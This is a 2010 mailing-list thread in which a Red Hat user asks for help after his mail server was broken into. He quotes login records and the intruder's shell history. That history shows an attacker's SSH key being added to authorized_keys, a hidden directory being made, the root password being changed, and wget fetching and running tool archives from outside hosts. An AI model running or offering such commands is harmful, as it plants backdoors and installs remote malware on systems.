Re: help

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



still i m thinking how he/she got my password??


On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:

> i have changed my root password
>
>
> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx
> > wrote:
>
>> You may change your root password first, and then you can continue to
>> analyze your system.
>>
>> ________________________________________
>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On
>> Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>> Sent: Thursday, January 28, 2010 12:59 PM
>> To: General Red Hat Linux discussion list
>> Subject: help
>>
>> Hello all,
>>                    i m using RHEL5.3 as a my mail server with real ip.i
>> configure my system mostly remotely.last login time of my system 27 jan
>> from   this ip 118.129.153.43.
>> than i try to login at 28 jan in morning so i can`t got authentication as
>> root from my last password.
>> than i reboot the system reset my password.
>> i login as a root than i run "last" command i m sending tha first 10 lines
>> of last command...i thinks someone hack my system.i am sending history
>> command output.
>> now i remove .ssh directory and /var/tmp/*
>>
>> please suggest wat is this??
>>
>> thanks
>>
>> last command out put:
>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>
>> What is 165.red-79........this is nt my ip.
>>
>>
>> History Output
>>
>>  115  cat /proc/cpuinfo
>>  116  mkdir .ssh
>>  117  cd .ssh
>>  118  echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>>  119  cd /var/tmp
>>  120  mkdir " "
>>  121  cd " "
>>  122  passwd
>>  123  echo ssh-rsa
>>
>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>> ~/.ssh/authorized_keys
>>  124  ps -x
>>  125  cd /var/tmp
>>  126  w
>>  127  wget http://kok.ucoz.de/gosh.tgz
>>  128  tar xvf gosh.tgz
>>  129  cd gosh
>>  130  chmod +x *
>>  131  ./go.sh 121
>>  132  w
>>  133  ps -x
>>  134  ps -aux
>>  135  cd /var/tmp
>>  136  cd " "
>>  137  ls -a
>>  138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>  139  tar xzvf fld.tgz
>>  140  cd fld
>>  141  chmod +x *
>>  142  nano cyc.acc
>>  143  nano cyc.acc.1
>>  144  nano cyc.set
>>  145  ./httpd
>>  146  w
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>> --
>> redhat-list mailing list
>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>> https://www.redhat.com/mailman/listinfo/redhat-list
>>
>
>
-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

[Index of Archives]     [CentOS]     [Kernel Development]     [PAM]     [Fedora Users]     [Red Hat Development]     [Big List of Linux Books]     [Linux Admin]     [Gimp]     [Asterisk PBX]     [Yosemite News]     [Red Hat Crash Utility]


  Powered by Linux